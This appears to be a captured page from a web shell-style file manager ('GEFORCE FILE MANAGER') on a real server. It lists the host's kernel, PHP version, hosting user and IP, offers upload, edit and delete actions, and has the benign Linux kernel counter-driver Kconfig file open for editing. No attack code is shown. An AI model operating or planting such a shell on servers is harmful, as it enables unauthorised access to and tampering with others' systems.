[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.56.1.el8_10.x86_64
/
drivers
/
counter
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 Kconfig
608 B
SET
[ EDIT ]
|
[ DEL ]
📄 Makefile
151 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Kconfig
# SPDX-License-Identifier: GPL-2.0-only # # Counter devices # menuconfig COUNTER tristate "Counter support" help This enables counter device support through the Generic Counter interface. You only need to enable this, if you also want to enable one or more of the counter device drivers below. if COUNTER config INTEL_QEP tristate "Intel Quadrature Encoder Peripheral driver" depends on PCI help Select this option to enable the Intel Quadrature Encoder Peripheral driver. To compile this driver as a module, choose M here: the module will be called intel-qep. endif # COUNTER